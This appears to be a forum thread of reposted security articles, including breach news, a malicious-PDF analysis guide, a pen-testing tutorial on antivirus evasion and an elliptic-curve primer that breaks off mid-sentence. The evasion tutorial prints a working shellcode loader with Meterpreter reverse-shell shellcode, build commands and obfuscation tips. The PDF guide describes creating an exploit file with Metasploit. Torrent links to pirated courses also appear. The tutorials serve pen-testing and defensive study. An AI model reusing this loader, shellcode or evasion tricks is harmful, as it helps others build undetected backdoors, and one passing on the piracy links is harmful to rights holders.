Usr6

Audio book http://www.youtube.com/watch?v=bsSj13Rplc0 part I http://www.youtube.com/watch?v=hS8ZNWE1Rpc part II

vBulletin.com hacked is the latest news going around, there seems to have been a spate of these lately, with huge numbers of user accounts leaked. Thankfully this time, the passwords are actually hashed, but with what algorithm – we aren’t quite sure. Perhaps someone could figure it out with HashTag. I do have some vBulletin forums as well, so I got the e-mail below: “We take your security and privacy very seriously. Very recently, our security team discovered sophisticated attacks on our network, involving the illegal access of forum user information, possibly including your password. Our investigation currently indicates that the attackers accessed customer IDs and encrypted passwords on our systems. We have taken the precaution of resetting your account password. We apologize for any inconvenience this has caused but felt that it was necessary to help protect you and your account.” Apparently they are using some kind of salted hash, so the password hashes should be fairly robust. But with the speed of hash brute forcing, any weak passwords should be discovered fairly quickly. Forumware giant vBulletin.com has admitted that it’s been turned over by hackers who made off with customer user IDs and encrypted passwords. vBulletin said it was resetting account passwords in response the the breach, which it blamed on a series of “sophisticated attacks”: It’s unclear what form of “password encryption” vBulletin actually used. In particular it’s unknown if the forum followed industry best practice and stored passwords only in a hashed digest format together with a pinch of salt as a defence against rainbow table-style brute-force attempts to decode its (now leaked) user credential database. In any case, users who inadvisedly choose the same password for vBulletin as elsewhere also need to change their password at the second location – this time to something different from anything they use elsewhere. Another reminder not to reuse passwords, use weak passwords etc. It comes shortly after some large forums (like MacRumours) were hacked, forums using vBulletin – which leads some to believe there is a pretty nasty 0-day for vBulletin out there. This has been supported by the fact that such an exploit is for sale on various exploit marketplaces by a group called Inj3ct0r Team. I’ve seen no reports so far though on the validity of the exploit for sale, and could it be what caused these compromises. The disclosure of a breach at vBulletin comes a week after forum site MacRumors (which runs on vBulletin) was hacked, exposing the credentials of more than 860,000 users. In a statement acknowledging the compromise, MacRumours apologised for the breach and advised commentards to change up their passwords. The attacks against MacRumors and vBulletin may be linked. A hacking group called Inj3ct0r Team claimed responsibility for both the MacRumours and vBulletin attacks before offering to sell the vulnerability exploit used – supposedly targeting an unpatched security hole in multiple versions of vBulletin’s server software – for $700 a pop through various exploit marketplaces, The Hacker News reports. The quality and provenance of the goods on sale remains unclear, but even the possibility that the sale could lead to widespread attacks against online forums has given some site admins the jitters. Hacking conference DEF CON, for one, has suspended its forums as a precaution, pending the availability of a suitable patch; a move it is making out of an abundance of caution and during its quiet season, months before its annual hacker jamboree in Las Vegas Sursa: vBulletin.com Hacked - Forum User Emails & Encrypted Passwords Leaked - Darknet - The Darkside

An intrusion at online dating service Cupid Media earlier this year exposed more than 42 million consumer records, including names, email addresses, unencrypted passwords and birthdays, according to information obtained by KrebsOnSecurity. The data stolen from Southport, Australia-based niche dating service Cupid Media was found on the same server where hackers had amassed tens of millions of records stolen from Adobe, PR Newswire and the National White Collar Crime Center (NW3C), among others. The purloined database contains more than 42 million entries in the format shown in the redacted image below. I reached out to Cupid Media on Nov. 8. Six days later, I heard back from Andrew Bolton, the company’s managing director. Bolton said the information appears to be related to a breach that occurred in January 2013. “In January we detected suspicious activity on our network and based upon the information that we had available at the time, we took what we believed to be appropriate actions to notify affected customers and reset passwords for a particular group of user accounts,” Bolton said. “We are currently in the process of double-checking that all affected accounts have had their passwords reset and have received an email notification.” I couldn’t find any public record — in the media or elsewhere — about this January 2013 breach. When I told Bolton that all of the Cupid Media users I’d reached confirmed their plain text passwords as listed in the purloined directory, he suggested I might have “illegally accessed” some of the company’s member accounts. He also noted that “a large portion of the records located in the affected table related to old, inactive or deleted accounts.” “The number of active members affected by this event is considerably less than the 42 million that you have previously quoted,” Bolton said. The company’s Web site and Twitter feed state that Cupid Media has more than 30 million customers around the globe. Unfortunately, many companies have a habit of storing data on customers who are no longer active. Alex Holden, chief information security officer at Hold Security LLC, said Bolton’s statement is reminiscent of the stance that software giant Adobe Systems Inc. took in the wake of its recently-disclosed breach. In that case, a database containing the email and password information on more than 150 million people was stolen and leaked online, but Adobe says it has so far only found it necessary to alert the 38 million active users in the leaked database. “Adobe said they have 38 million users and they lost information on 150 million,” Holden said. “It comes to down to the definition of users versus individuals who entrusted their data to a service.” The danger with such a large breach is that far too many people reuse the same passwords at multiple sites, meaning a compromise like this can give thieves instant access to tens of thousands of email inboxes and other sensitive sites tied to a user’s email address. Indeed, Facebook has been mining the leaked Adobe data for information about any of its own users who might have reused their Adobe password and inadvertently exposed their Facebook accounts to hijacking as a result of the breach. Holden added that this database would be a gold mine for spammers, noting that Cupid’s customers are probably more primed than most to be responsive to the types of products typically advertised in spam (think male enhancement pills, dating services and diet pills). Bolton adopted a softer tone in the second half of his email, indicating that the company may not have understood the full scope of the intrusion. “Since you have now provided additional information we now have a clearer picture of what transpired back in January,” Bolton wrote. “We are currently in the process of double-checking that all affected accounts have had their passwords reset and have received an email notification.” Bolton continued: Subsequently to the events of January we hired external consultants and implemented a range of security improvements which include hashing and salting of our passwords. We have also implemented the need for consumers to use stronger passwords and made various other improvements. We would like to thank you for bringing this issue to our attention and I can confirm that we are committed to investigate this matter further and make any additional improvements still required. Protecting our customer’s privacy and data is important to us and we will continue to make additional investments in improved security for our members. We sincerely apologize for the inconvenience this has caused our members. It is entirely likely that the records I have seen are from the January breach, and that the company no longer stores its users’ information and passwords in plain text. At least Cupid Media doesn’t send your password in plain text when you request a password reset, like far too many other companies do. It’s also remarkable that a company with this many users would not have seen this coming. Back in Feb. 2011, I broke a story that received considerable media attention; it was about a hack that exposed some 30 million customer records at Plenty Of Fish (pof.com), an online dating service that also admitted to storing its users’ passwords in plaintext. In any case, since I didn’t have to crack any of the passwords, I thought it might be useful to have a look at the top passwords used by Cupid Media customers. It seems that many Cupid users did not place much value in their accounts when picking passwords, because a huge percentage of them chose downright awful passwords. By my count, more than 10 percent of Cupid’s users chose one of these 10 passwords: The top 10 non-numeric passwords are probably typical for a dating site, but still horrible nonetheless: Sursa: Cupid Media Hack Exposed 42M Passwords — Krebs on Security

PDF files have become very common in everyday work. It’s hard to imagine business proposals without PDFs. The PDF format is used in almost all companies to share business deals, company brochures, and even invitations. Previous years were not good for PDF users, as several vulnerabilities were published, such as buffer overflow vulnerability in versions prior to version 9. A lot of the attacks were observed trying to abuse the bug by using social engineering or by hosting malicious PDF files on the Internet. Just the simple act of opening the PDF file could exploit a vulnerability to automatically download malicious code from the internet, and display a decoy PDF file to trick you into believing that nothing wrong has happened. Malicious PDF files are frequently used as part of targeted and mass-scale computer attacks for these reasons. It’s good to know how to analyze PDF files, but analysts first need a basic understanding of a PDF before they deem it malicious. Here is the information you’ll need to know. PDF Structure The PDF has ability to deliver rich contents (static and dynamic) . Combined, these elements can deliver a visually appealing, interactive, and portable document. While we have all benefited from this feature-rich information-sharing venue, there exists a darker side. The dynamic PDF capabilities mentioned above can and have been used to house malicious content. In previous years, cybercriminals embedded malicious script to install malware and steal user credentials. Normally, the PDF malware’s malicious behavior is in a script that is embedded In PDF files. The scripts that are responsible for malicious behavior can be written in a scripting language that PDF supports. JavaScript is the most popular for this purpose. In most cases, the embedded scripts are responsible for dropper functionality, or else there is a need to install an OS-based malware on the victim’s system. PDF Document Structure The general structure of a PDF file is composed of the following code components: Boolean values, representing true or false Numbers Strings Names Arrays, ordered collections of objects Dictionaries, collections of objects indexed by names Streams, usually containing large amounts of data The null object Execute Malware with PDF A launch action launches an application or opens or prints a document. We can use one of the many Adobe Acrobat exploits in the Metasploit framework to embed an exe with PDF. cmd will be opened by using the above launch action. We can embed the malware in our PDF by using JavaScript because JavaScript commonly uses heap spray to exploit. When we open any malicious PDF file, it will execute the JavaScript and it exploits the JavaScript; after that, the shell code is processed and a Trojan will be executed from the Internet. Create a Malicious PDF File with Metasploit We are going to be using the Adobe Reader “util.printf()” JavaScript function stack buffer overflow vulnerability to create a malicious PDF file. Adobe Reader is prone to a stack-based buffer-overflow vulnerability. The steps for creating our malicious PDF file are as follows: Open msfconsole and execute the following command. Once we have all the options set the way we want, we run “exploit” to create our malicious file. We can see that our PDF file was created. You can access this PDF by using the given path. If no files are visible, press CTRL and H together to find hidden files and folders. Before we send the malicious file to our victim, we need to set up a listener to capture this reverse connection. As the victim opens the malicious file, the session with the victim has been established and we can access the victim’s system by using meterpreter. Methods of Analyzing Malicious PDF file Analyzing a PDF file involves examining, decoding, and extracting the contents of suspicious PDF objects that may be used to exploit a vulnerability in Adobe Reader and execute a malicious payload. There is an increasing number of tools that are designed to assist with this process. Mainly, analysis of PDF can be done in two ways: online and offline. Online PDF Analyzers Every time you feel a file is suspicious or you receive a file from an untrusted source, it’s recommended that you scan it with one of the following online services before you open it. Online PDF analyzers makes our work easier. We just have to submit the malicious PDF file and the online analyzer starts scanning the uploaded PDF for several known exploits. Wepawet Wepawet is a service for detecting and analyzing web-based malware. It currently handles Flash, JavaScript, and PDF files. To use Wepawet, just go to Wepawet ? Home. Upload a sample or specify a URL and the resource will be analyzed and a report will be generated. PDF Examiner PDF Examiner by Malware Tracker is able to scan the uploaded PDF for several known exploits and it allows the user to explore the structure of the file, as well as examining, decoding, and dumping PDF object contents. This tool lends itself well to manual PDF analysis tasks. Go to malware tracker. Press the tab of +Pdf examiner scan tab and select the PDF to scan. Jsunpack It is designed for automatically examining and deobfuscating JavaScript. Its features also include carving contents of network packet capture (PCAP) files and identifying common client-side exploits. It can also examine PDF files for malicious JavaScript artifacts. Go to jsunpack.jeek.org. Offline PDF Analyzer If we have to examine the PDF manually, then the following are the tools to be used. PDF Stream Dumper After installing PDF Stream Dumper, load the suspicious PDF file and start looking around. You can see different colors on the right side, where the red color shows headers with JavaScript tags. The tool includes a number of signatures of known PDF exploits. To scan the file, select “Exploits Scan” from the menu by pressing. Our malicious PDF shows that it contains an exploit of CVE- 2008-2992. We are now reasonably certain that we’re dealing with a malicious PDF file that exploits the CVE-2008-2992 vulnerability in Acrobat Reader to extract and run a malicious executable embedded in the PDF. We can get the more information about the exploit by visiting cvedetails.com and entering the CVE number of the exploit. Peepdf Peepdf is a Python tool to explore PDF files in order to find out if the file can be harmful or not. The aim of this tool is provide all the necessary components that a security researcher could need in a PDF analysis without using three or four tools to perform all the tasks. Here maliciouspdf.pdf is the PDF file we want to analyze. If there are some objects with Java script code in PDF content, we can use the JS commands to analyze them. We can clearly see from the above screenshot that object No. 5 is JavaScript, for which PyV8 is required. After analyzing the JavaScript code of the object, we can get the URL of the exe which is bound to the PDF. Origami Origami is a Ruby framework designed to parse, analyze, and forge PDF documents. It can be used to create on-the-fly customized PDFs, or to inject (evil) code into already existing documents. Pdfid Pdfid is a utility that can extract useful information from a PDF file. Specifically, pdfid extracts header information from the PDF such as Java Script, obj, endobj, stream and other information. Some PDF exploits alter this information, so pdfid can sometimes show the user what exactly is going on inside of the PDF. Protection Enable automatic updates. Disable PDF browser integration. Always install the latest patch/update, even for older Adobe product versions. Disable JavaScript. Uncheck “Allow non-PDF file attachments with external applications” to prevent launch action vulnerability. Use PDF alternatives such as Foxit, Sumatra, PDF XChange. Conclusion Several vulnerabilities were found in previous years and it keeps increasing day by day, so it’s important to analyze any PDF before opening it because just the simple act of opening the PDF file could exploit a vulnerability to automatically download malicious code from the Internet. We can analyze any PDF by using online approach or offline approach. For the protection we have to use the alternative PDF reader and always install the update or patch of PDF reader. Reference Client Side Exploits using PDF Analyzing Suspicious PDF Files With PDF Stream Dumper www.infosec.gov.hk/sc_chi/promotion/files/20100311_04.pdf http://code.google.com/p/peepdf/? origami-pdf - Origami is a Ruby framework designed to parse, analyze, and forge PDF documents. - Google Project Hosting Sursa: Analyzing Malicious PDF - InfoSec Institute

By Mark Baggett, the SANS Institute You know the old saying... "Give a man a backdoor undetected by antivirus and he pwns for a day. Teach a man to make backdoors undetected by antivirus and you will get free drinks for life at DEF CON." During the exploitation phase of a pen test or ethical hacking engagement, you will ultimately need to try to cause code to run on target system computers. Whether accomplished by phishing emails, delivering a payload through an exploit, or social engineering, running code on target computers is part of most penetration tests. That means that you will need to be able to bypass antivirus software or other host-based protection for successful exploitation. The most effective way to avoid antivirus detection on your target's computers is to create your own customized backdoor. Here are some tips for creating your own backdoors for use in penetration testing: TIP #1: Do your reconnaissance. Know what antivirus software target system personnel are running. While it is certainly possible to make a backdoor that evades all antivirus software products, there is no need to waste those cycles if your target is only running one product, a significant likelihood. Narrow down your options by getting this information from target system personnel by asking, looking for information leakage such as e-mails footers that proclaim the AV product, or even a friendly social engineering phone call if such interaction is allowed in your rules of engagement. TIP #2: If you want to use your backdoor for more than one project, do not submit it to virustotal.com or any of the other online sandboxes/scanner that work with antivirus software companies to generate new signatures. Instead, buy a copy of the antivirus product used by your target organization and test it on your own systems. Alternatively if your target is using one of the nine AV products scanned by VirusNoThanks, you could use Free Online Multi Engine Antivirus File and URL Scanner - Powered by NoVirusThanks.org and be sure to select "Do no distribute the sample" at the bottom of the page. TIP #3: KISS — Keep it simple, shell-boy. I'm a minimalist when it comes to remote access. I just need enough to get in, disable antivirus (if the rules of engagement will allow it), and then move in with more full-featured tools. This approach requires less coding on my part and there is less of a chance that I will incorporate something that antivirus doesn't like. TIP #4: You don't have to COMPLETELY reinvent this wheel. Metasploit has templates in the data/templates/src directory for DLLs, EXEs, and Windows Services. Start with them and modify them only as required to avoid your target's defenses. For example: $ cat data/templates/src/pe/exe/template.c #include <stdio.h> #define SCSIZE 4096 char payload[SCSIZE] = "PAYLOAD:"; char comment[512] = ""; int main(int argc, char **argv) { (*(void ()) payload)(); return(0); } You can set the payload[sCSIZE] array to any shell code that meets your needs and compile it. There are plenty of options out there for shell code. You can get several examples of shell code from exploit-db (Shellcode ? Exploits Database by Offensive Security) and many of them do not trigger antivirus software. Or, you can also use msfpayload or msfvenom from Metasploit to generate C shell code and plug that into the template. For example: $ ./msfpayload windows/shell_bind_tcp C This generates C shell code to bind a shell to TCP port 4444. Compile it, and check to see if the AV product running in your lab detects it. If the compiled program is detected, you have a lot of flexibility in source code. You can try: - Moving part of your shell code to a different data segment - Compile it to different PE, Old EXE, or COM (yes... I said .COM) formats - Break the shell code up into smaller strings and mix the order in the source code. Then reassemble it into a variable in memory in the correct order before calling it - Use timed events or wait() functions to delay the payload execution to avoid heuristic engines - Create your own simple encoding engine to mask the bytes... it is easier than you think! Check out XOR Encryption - Cprogramming.com I like writing in Python, then using pyinstaller to create an exe out of my Python script. Here is a Python template I wrote that does the same thing as the C template provided with Metasploit: from ctypes import * shellcode = '<-ascii shell code here ex: \x90\x90\x90->' memorywithshell = create_string_buffer(shellcode, len(shellcode)) shell = cast(memorywithshell, CFUNCTYPE(c_void_p)) shell() If you want to use a Metasploit payload as your shell code, you can easily turn C source into a Python-compatible string by deleting all the double quotes and new lines using the handy tr command as follows: $ ./msfpayload windows/shell_bind_tcp C | tr —d '"' | tr —d '\n' If you generate a multi-stage payload, just grab the string for stage one. For example, to create a Metasploit framework reverse Meterpreter, I would do the following: $ ./msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1 C | tr -d '"' | tr -d '\n' | more Then grab the string produced for STAGE1 and plug it into my template as follows: from ctypes import * shellcode = '\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\x7f\x00\x00\x01\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x85\xf6\x75\xec\xc3' memorywithshell = create_string_buffer(shellcode, len(shellcode)) shell = cast(memorywithshell, CFUNCTYPE(c_void_p)) shell() Next, I'll compile my new backdoor with pyinstaller with the following options: Next, I'll compile my new backdoor with pyinstaller with the following options: $ python configure.py $ python makespec.py --onefile --noconsole shell_template.py $ python build.py shell_template\shell_template.spec To use the new payload we setup the Metasploit framework with the multi-handler "exploit". Once our program is run on the target, it connects back to the framework where stage2 is delivered. msf > use multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 127.0.0.1 LHOST => 127.0.0.1 msf exploit(handler) > exploit I hope you find these techniques useful as you help organizations better understand their security risks and improve their defenses through your penetration testing work! Sursa: https://pen-testing.sans.org/blog/2011/10/13/tips-for-evading-anti-virus-during-pen-testing#respond

daca povestea e adevarata, pentru jandarmii in cauza:

NU dati approve, nu e gata Compilers and interpreters - Stanford Compilers : Compilers and interpreters [Coursera] [stanford Univ (download torrent) - TPB Startup Engineering - Stanford Startup Engineering [Coursera] [stanford] [2013] (download torrent) - TPB Algorithms 1 and 2 Coursera_Algorithms_1_and_2 (download torrent) - TPB Crypto I Coursera-Crypto-I (download torrent) - TPB Introduction to Logic - Stanford Introduction to Logic - Stanford University - Coursera (download torrent) - TPB Neural Networks and Machine Learning Coursera - Neural Networks and Machine Learning - Geoffrey Hinto (download torrent) - TPB An Introduction to Interactive Programming in Python Coursera An Introduction to Interactive Programming in Python Torrent Download Artificial Intelligence http://kickass.to/artificial-intelligence-coursera-org-t6798733.html Data Analysis Coursera - Data Analysis (2013) Torrent Download Natural Language Processing Coursera / Stanford University - Natural Language Processing download torrent Design and Analysis of Algorithms I Coursera / Stanford University - Design and Analysis of Algorithms I : Algorithms and Data Structures torrent download Computer Science 101 Coursera / Stanford University - Computer Science 101 torrent download Functional Programming Principles in Scala Coursera - Functional Programming Principles in Scala torrent download Programming Languages http://www.sumotorrent.sx/en/details/8720840/Coursera%20-%20Programming%20Languages.html

Coursera - Malicious Software and its Underground Economy: Two Sides to Every Story English | Jun 17th 2013 | mp4, pdf | H264 960x540 | AAC 2 ch 126 kbps | 835 MB eLearning | Workload: 5-10 hours/week Cybercrime has become both more widespread and harder to battle. Researchers and anecdotal experience show that the cybercrime scene is becoming increasingly organized and consolidated, with strong links also to traditional criminal networks. Modern attacks are indeed stealthy and often profit oriented. Malicious software (malware) is the traditional way in which cybercriminals infect user and enterprise hosts to gain access to their private, financial, and intellectual property data. Once stolen, such information can enable more sophisticated attacks, generate illegal revenue, and allow for cyber-espionage. By mixing a practical, hands-on approach with the theory and techniques behind the scene, the course discusses the current academic and underground research in the field, trying to answer the foremost question about malware and underground economy, namely, "Should we care?". Students will learn how traditional and mobile malware work, how they are analyzed and detected, peering through the underground ecosystem that drives this profitable but illegal business. Understanding how malware operates is of paramount importance to form knowledgeable experts, teachers, researchers, and practitioners able to fight back. Besides, it allows us to gather intimate knowledge of the systems and the threats, which is a necessary step to successfully devise novel, effective, and practical mitigation techniques Recommended Background Operating Systems, Computer Architecture, Computer Security Class (optional) Course Format The course materials will incorporate video/audio learning content with formative assessments and the addition of hands-on challenges to be completed by the students as self-assessed study. Download: | Ebook Library | Ebook Library | Ebook Library Sursa: Coursera - Malicious Software and its Underground Economy: Two Sides to Every Story - Security/Hacking Downloads - Ebook Library

Legally free programming books: Download Free Books - Programming, Computer Science and IT - Read Online

cred ca show-ul deabea incepe: Statele Unite au avertizat serviciile de informa?ii str?ine c? unele documente ob?inute de Edward Snowden con?in detalii despre cooperarea lor secret? cu Washingtonul. Printre zecile de mii de documente ob?inute de fostul consultant al Agen?iei Na?ionale de Securitate americane (NSA), unele con?in informa?ii sensibile despre programe implementate împotriva unor ??ri ca Iran, Rusia ?i China, potrivit publica?iei, care citeaz? surse anonime din cadrul administra?iei Statelor Unite a anun?at joi seara Washington Post. Anun?ul coincide cu apari?ia informa?iei c? Statele Unite ar fi spionat telefonul mobil al cancelarului german Angela Merkel, ultima dintr-o serie de dezv?luiri ce arat? amploarea spionajului american în lume. Într-un caz, documentele ob?inute de Snowden con?in informa?ii despre un program de spionare a Rusiei de c?tre o ?ar? NATO, care a oferit informa?ii pre?ioase for?elor armate aeriene ?i Marinei americane, a anun?at Washington Post. Dac? ru?ii îl vor afla, nu le va fi dificil s? ia m?surile necesare pentru a-i pune cap?t", a spus un oficial american, citat de publica?ie. sursa: SUA avertizeaz? servicii de informa?ii aliate în privin?a unor documente ob?inute de Snowden - pres? - Mediafax

Elliptic curve cryptography (ECC) is one of the most powerful but least understood types of cryptography in wide use today. An increasing number of websites make extensive use of ECC to secure everything from customers' HTTPS connections to how they pass data between data centers. Fundamentally, it's important for end users to understand the technology behind any security system in order to trust it. To that end, we looked around to find a good, relatively easy-to-understand primer on ECC in order to share with our users. Finding none, we decided to write one ourselves. That is what follows. Be warned: this is a complicated subject, and it's not possible to boil it down to a pithy blog post. In other words, settle in for a bit of an epic because there's a lot to cover. If you just want the gist, here's the TL;DR version: ECC is the next generation of public key cryptography, and based on currently understood mathematics, it provides a significantly more secure foundation than first-generation public key cryptography systems like RSA. If you're worried about ensuring the highest level of security while maintaining performance, ECC makes sense to adopt. If you're interested in the details, read on. The dawn of public key cryptography The history of cryptography can be split into two eras: the classical era and the modern era. The turning point between the two occurred in 1977, when both the RSA algorithm and the Diffie-Hellman key exchange algorithm were introduced. These new algorithms were revolutionary because they represented the first viable cryptographic schemes where security was based on the theory of numbers; it was the first to enable secure communication between two parties without a shared secret. Cryptography went from being about securely transporting secret codebooks around the world to being able to have provably secure communication between any two parties without worrying about someone listening in on the key exchange. Modern cryptography is founded on the idea that the key that you use to encrypt your data can be made public while the key that is used to decrypt your data can be kept private. As such, these systems are known as public key cryptographic systems. The first, and still most widely used of these systems, is known as RSA—named after the initials of the three men who first publicly described the algorithm: Ron Rivest, Adi Shamir, and Leonard Adleman. What you need for a public key cryptographic system to work is a set of algorithms that is easy to process in one direction but difficult to undo. In the case of RSA, the easy algorithm multiplies two prime numbers. If multiplication is the easy algorithm, its difficult pair algorithm is factoring the product of the multiplication into its two component primes. Algorithms that have this characteristic—easy in one direction, hard the other—are known as trapdoor functions. Finding a good trapdoor function is critical to making a secure public key cryptographic system. Simplistically, the bigger the spread between the difficulty of going one direction in a trapdoor function and going the other, the more secure a cryptographic system based on it will be. A toy RSA algorithm The RSA algorithm is the most popular and best understood public key cryptography system. Its security relies on the fact that factoring is slow and multiplication is fast. What follows is a quick walk-through of what a small RSA system looks like and how it works. In general, a public key encryption system has two components, a public key and a private key. Encryption works by taking a message and applying a mathematical operation to it to get a random-looking number. Decryption takes the random looking number and applies a different operation to get back to the original number. Encryption with the public key can only be undone by decrypting with the private key. Computers don't do well with arbitrarily large numbers. We can make sure that the numbers we are dealing with do not get too large by choosing a maximum number and only dealing with numbers less than the maximum. We can treat the numbers like the numbers on an analog clock. Any calculation that results in a number larger than the maximum gets wrapped around to a number in the valid range. In RSA, this maximum value (call it max) is obtained by multiplying two random prime numbers. The public and private keys are two specially chosen numbers that are greater than zero and less than the maximum value (call them pub and priv). To encrypt a number, you multiply it by itself pub times, making sure to wrap around when you hit the maximum. To decrypt a message, you multiply it by itself priv times, and you get back to the original number. It sounds surprising, but it actually works. This property was a big breakthrough when it was discovered. To create an RSA key pair, first randomly pick the two prime numbers to obtain the maximum (max). Then pick a number to be the public key pub. As long as you know the two prime numbers, you can compute a corresponding private key priv from this public key. This is how factoring relates to breaking RSA—factoring the maximum number into its component primes allows you to compute someone's private key from the public key and decrypt their private messages. Let's make this more concrete with an example. Take the prime numbers 13 and 7. Their product gives us our maximum value of 91. Let's take our public encryption key to be the number 5. Then using the fact that we know 7 and 13 are the factors of 91 and applying an algorithm called the Extended Euclidean Algorithm, we get that the private key is the number 29. These parameters (max: 91, pub: 5, priv: 29) define a fully functional RSA system. You can take a number and multiply it by itself 5 times to encrypt it, then take that number and multiply it by itself 29 times and you get the original number back. Let's use these values to encrypt the message "CLOUD". In order to represent a message mathematically, we have to turn the letters into numbers. A common representation of the Latin alphabet is UTF-8. Each character corresponds to a number. Under this encoding, CLOUD is 67, 76, 79, 85, 68. Each of these digits is smaller than our maximum of 91, so we can encrypt them individually. Let's start with the first letter. We have to multiply it by itself five times to get the encrypted value. 67×67 = 4489 = 30 * *Since 4489 is larger than max, we have to wrap it around. We do that by dividing by 91 and taking the remainder. 4489 = 91×49 + 30 30×67 = 2010 = 8 8×67 = 536 = 81 81×67 = 5427 = 58 This means the encrypted version of 67 (or C) is 58. Repeating the process for each of the letters, we get that the encrypted message CLOUD becomes: 58, 20, 53, 50, 87 To decrypt this scrambled message, we take each number and multiply it by itself 29 times: 58×58 = 3364 = 88 (Remember, we wrap around when the number is greater than max.) 88×58 = 5104 = 8 … 9×58 = 522 = 67 Voila, we're back to 67. This works with the rest of the digits, resulting in the original message. The takeaway is that you can take a number, multiply it by itself a number of times to get a random-looking number, and then multiply that number by itself a secret number of times to get back to the original number. Not a perfect trapdoor RSA and Diffie-Hellman were so powerful because they came with rigorous security proofs. The authors proved that breaking the system is equivalent to solving a mathematical problem that is thought to be difficult. Factoring is a very well-known problem and has been studied since antiquity (see the Sieve of Eratosthenes). Any breakthroughs would be big news and would net the discoverer a significant financial windfall. That said, factoring is not the hardest problem on a bit-for-bit basis. Specialized algorithms like the Quadratic Sieve and the General Number Field Sieve were created to tackle the problem of prime factorization and have been moderately successful. These algorithms are faster and less computationally intensive than the naive approach of just guessing pairs of known primes. These factoring algorithms get more efficient as the size of the numbers being factored gets larger. The gap between the difficulty of factoring large numbers and multiplying large numbers is shrinking as the number (i.e. the key's bit length) gets larger. As the resources available to decrypt numbers increase, the size of the keys needs to grow even faster. This is not a sustainable situation for mobile and low-powered devices that have limited computational power. The gap between factoring and multiplying is not sustainable in the long term. All this means is that RSA is not the ideal system for the future of cryptography. In an ideal trapdoor function, the easy way and the hard way get harder at the same rate with respect to the size of the numbers in question. So we need a public key system based on a better trapdoor. Elliptic curves: Building blocks of a better trapdoor After the introduction of RSA and Diffie-Hellman, researchers explored additional mathematics-based cryptographic solutions looking for other algorithms beyond factoring that would serve as good trapdoor functions. In 1985, cryptographic algorithms were proposed based on an esoteric branch of mathematics called elliptic curves. But what exactly is an elliptic curve and how does the underlying trapdoor function work? Unfortunately, unlike factoring—something we all had to do for the first time in middle school—most people aren't as familiar with the math around elliptic curves. The math isn't as simple, nor is explaining it, but I'm going to give it a go over the next few sections. (If your eyes start to glaze over, you can skip way down to the section entitled "What does it all mean.") An elliptic curve is the set of points that satisfy a specific mathematical equation. The equation for an elliptic curve looks something like this: y^2 = x^3 + ax + b That graphs to something that looks a bit like the Lululemon logo tipped on its side: There are other representations of elliptic curves, but technically an elliptic curve is the set points satisfying an equation in two variables with degree two in one of the variables and three in the other. An elliptic curve is not just a pretty picture, it also has some properties that make it a good setting for cryptography. Strange symmetry Take a closer look at the elliptic curve plotted above. It has several interesting properties. One of these is horizontal symmetry. Any point on the curve can be reflected over the x-axis and remain the same curve. A more interesting property is that any non-vertical line will intersect the curve in at most three places. Let's imagine this curve as the setting for a bizarre game of billiards. Take any two points on the curve and draw a line through them; the line will intersect the curve at exactly one more place. In this game of billiards, you take a ball at point A and shoot it toward point B. When it hits the curve, the ball bounces either straight up (if it's below the x-axis) or straight down (if it's above the x-axis) to the other side of the curve. We can call this billiards move on two points "dot." Any two points on a curve can be dotted together to get a new point. A dot B = C We can also string moves together to "dot" a point with itself over and over. A dot A = B A dot B = C A dot C = D ... It turns out that if you have two points, an initial point "dotted" with itself n times to arrive at a final point, finding out n when you only know the final point and the first point is hard. To continue our bizarro billiards metaphor, imagine that one person plays our game alone in a room for a random period of time. It is easy for him to hit the ball over and over following the rules described above. If someone walks into the room later and sees where the ball has ended up, even if they know all the rules of the game and where the ball started, they cannot determine the number of times the ball was struck to get there without running through the whole game again until the ball gets to the same point. Easy to do, hard to undo. This is the basis for a very good trapdoor function. Let’s get weird This simplified curve above is great to look at and explain the general concept of elliptic curves, but it doesn't represent what the curves used for cryptography look like. For this, we have to restrict ourselves to numbers in a fixed range like in RSA. Rather than allow any value for the points on the curve, we restrict ourselves to whole numbers in a fixed range. When computing the formula for the elliptic curve (y^2 = x^3 + ax + , we use the same trick of rolling over numbers when we hit the maximum. If we pick the maximum to be a prime number, the elliptic curve is called a "prime curve" and has excellent cryptographic properties. Here's an example of a curve (y^2 = x^3 - x + 1) plotted for all numbers: Here's the plot of the same curve with only the whole number points represented with a maximum of 97: This hardly looks like a curve in the traditional sense, but it is. It's like the original curve was wrapped around at the edges and only the parts of the curve that hit whole number coordinates are colored in. You can even still see the horizontal symmetry. In fact, you can still play the billiards game on this curve and dot points together. The equation for a line on the curve still has the same properties. Moreover, the dot operation can be efficiently computed. You can visualize the line between two points as a line that wraps around at the borders until it hits a 